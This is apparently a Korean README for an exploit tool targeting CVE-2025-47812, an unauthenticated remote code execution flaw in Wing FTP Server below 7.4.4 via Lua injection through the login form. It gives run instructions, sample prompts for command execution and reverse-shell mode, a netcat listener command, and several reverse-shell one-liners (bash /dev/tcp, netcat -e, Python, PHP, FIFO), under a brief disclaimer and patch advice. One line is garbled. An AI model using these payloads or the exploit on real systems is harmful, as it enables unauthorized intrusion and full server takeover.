
Wing FTP Server < 7.4.4용 인증되지 않은 원격 코드 실행 익스플로잇으로, 세션 파일의 Lua 주입을 통해 명령 실행 및 리버스 셸을 가능하게 합니다.
CVE-2025-47812 - Wing FTP Server 원격 코드 실행 (RCE)
===========================================================
작성자: blindma1den
날짜: 2025년 7월
익스플로잇 유형: 원격 코드 실행 (인증 없음)
대상: Wing FTP Server 7.4.4 미만
CVSS 점수: 10.0 (치명적)
이 스크립트는 CVE-2025-47812를 익스플로잇합니다. 이는 Wing FTP Server 웹 인터페이스의 치명적인 취약점으로, 원격 공격자가 인증 없이 임의의 시스템 명령을 실행하거나 리버스 셸을 열 수 있게 합니다.
이 결함은 로그인 폼 (/loginok.html)에서 널 바이트 (%00)를 부적절하게 처리하여 발생합니다.
이로 인해 세션 파일에 Lua 코드가 삽입되고, 이후 /dir.html과 같은 엔드포인트에 접근할 때 해당 코드가 평가됩니다.
NVD 설명: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
whoami, uname -a)의존성 설치:
pip install requests
스크립트 실행:
python3 wingftp_rce_exploit.py
다음 항목을 입력하라는 메시지가 표시됩니다:
[1] 명령 실행:
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami
[2] 리버스 셸:
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444
셸을 트리거하기 전에 리스너 시작:
nc -lvnp 4444
Bash: bash -i >& /dev/tcp/IP/PORT 0>&1
Python3: python3 -c 'import socket,subprocess,os; ...'
Netcat: nc IP PORT -e /bin/sh
PHP: php -r '$sock=fsockopen("IP",PORT); ...'
FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...
이 코드는 교육 목적으로만 제공됩니다. 소유하지 않거나 테스트할 명시적 권한이 없는 시스템에 이 익스플로잇을 사용하지 마십시오. 허가되지 않은 사용은 불법이며 비윤리적입니다.
시스템을 즉시 패치하십시오. Wing FTP Server 7.4.4는 이 취약점을 해결합니다.
즐거운 해킹 되세요!